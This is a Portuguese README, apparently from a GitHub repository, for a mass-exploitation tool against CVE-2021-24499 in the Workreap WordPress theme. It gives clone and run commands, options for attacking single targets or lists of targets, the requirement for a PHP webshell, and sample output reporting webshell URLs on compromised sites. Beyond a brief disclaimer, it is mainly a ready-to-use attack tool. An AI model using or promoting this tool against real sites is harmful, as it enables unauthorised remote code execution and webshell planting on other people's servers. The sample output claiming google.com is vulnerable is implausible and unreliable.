
Tema WordPress Workreap 2.2.2 - Upload Não Autenticado Levando a Execução Remota de Código
Tema WordPress Workreap 2.2.2 - Upload não autenticado de arquivo levando à Execução Remota de Código
Uma ferramenta de exploração em massa poderosa e precisa para a vulnerabilidade CVE-2021-24499 no tema WordPress Workreap. Esse exploit permite upload não autenticado de arquivos, o que pode levar à Execução Remota de Código (RCE).
CVE-2021-24499 é uma vulnerabilidade crítica no tema WordPress Workreap (versão 2.2.2 e anteriores) que permite que usuários não autenticados façam upload de arquivos arbitrários, incluindo arquivos PHP, através da ação AJAX workreap_award_temp_file_uploader. Isso pode levar à Execução Remota de Código (RCE) no servidor alvo.
Versões Vulneráveis: Todas as versões até e incluindo 2.2.2
Pontuação CVSS: Crítica
curl ferramenta de linha de comandoopts.php ou shell.php (webshell PHP)git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
chmod +x exploit.sh
opts.php ou shell.php no mesmo diretório (seu webshell PHP)Alvo Único:
./exploit.sh -u http://target.com
Múltiplos Alvos (a partir de arquivo):
./exploit.sh -l targets.txt
Mostrar Ajuda:
./exploit.sh --help
| Opção | Descrição |
|---|---|
-u URL | Explora um único URL alvo |
-l FILE | Explora múltiplos alvos a partir de um arquivo (um URL por linha) |
--help | Mostra o menu de ajuda |
Crie um arquivo de texto com um URL por linha:
http://target1.com
https://target2.com
http://target3.com
$ ./exploit.sh -u https://domain.com
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com/ >> VULNERABLE!
--> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php
$ ./exploit.sh -l targets.txt
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com >> NOT VULNERABLE!
https://www.google.com >> VULNERABLE!
https://www.domain.com >> NOT VULNERABLE!
https://google.com >> VULNERABLE!
Esta ferramenta é fornecida apenas para fins educacionais e de teste autorizado.
Ao usar esta ferramenta, você concorda em usá-la apenas para fins legítimos de teste de segurança e pesquisa.
Autor: Jay Maranatha Hutajulu
Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.
Contribuições, problemas e solicitações de recursos são bem-vindos! Sinta-se à vontade para verificar a página de issues.
Se você achar esta ferramenta útil, considere dar uma estrela ⭐
Lembre-se: Sempre use ferramentas de segurança com responsabilidade e ética. Happy hacking! 🚀